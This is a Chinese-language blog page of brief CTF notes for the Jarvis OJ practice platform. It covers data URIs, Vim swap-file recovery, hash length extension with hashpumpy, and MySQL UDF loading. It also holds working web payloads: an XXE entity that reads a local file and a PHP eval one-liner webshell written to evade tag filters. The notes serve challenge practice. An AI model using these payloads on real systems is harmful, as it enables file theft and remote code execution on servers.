Jarvis Oj
本文最后更新于 1804 天前,其中的信息可能已经有所发展或是发生改变。

Data URI Scheme

data:,<文本数据>  
data:text/plain,<文本数据>  
data:text/html,<HTML代码>  
data:text/html;base64,<base64编码的HTML代码>  
data:text/css,<CSS代码>  
data:text/css;base64,<base64编码的CSS代码>  
data:text/javascript,<Javascript代码>  
data:text/javascript;base64,<base64编码的Javascript代码>  
data:image/gif;base64,base64编码的gif图片数据  
data:image/png;base64,base64编码的png图片数据  
data:image/jpeg;base64,base64编码的jpeg图片数据  
data:image/x-icon;base64,base64编码的icon图片数据

Vim恢复文件

可能为

index.php.swp     index.php~

#修改后缀为.swp使用
vim -r index.php.swp

 

XXE

XXE(XML External Entity Injection) XML外部实体注入

任意文件读取

<?xml version="1.0"?>
<!DOCTYPE abcd[<!ENTITY any SYSTEM "file:///home/ctf/flag.txt">]>
<something>&any;</something>

待续….

 

Hash长度扩展攻击

常见hash_extender:

已知hash{secret(已知长度)},求hash{secret (已知长度)|| data (填充字段)|| attacker_controlled_data(自定义字符串)}

hashpumpy:

hashpump(hexdigest, original_data, data_to_add, key_length) return (digest, message)

hashpumpy in Linux

apt install libssl-dev
pip install hashpumpy
python
>>> import hashpumpy
>>> hashpumpy.hashpump(hexdigest, original_data, data_to_add, key_length)

本题:

已知md5(secret(未知长度)+string1),求md5{secret||%00等填充字段||2string}

 

扩展MySQL函数—UDF

在Linux环境下通常文件为 xxx.so

导入步骤

将文件下载到/usr/lib64/mysql/plugin

进入mysql命令行:

create function help_me returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';

其中help_me为那题的函数名,udf.so是题目文件,加载完拓展函数后就可运行

select help_me();

 

PHP一句话替代

若<?php?>被 过滤禁止

<script language="php">@eval_r($_POST['pwd'])</script>

 

PHP反序列化

待续…

上一篇
下一篇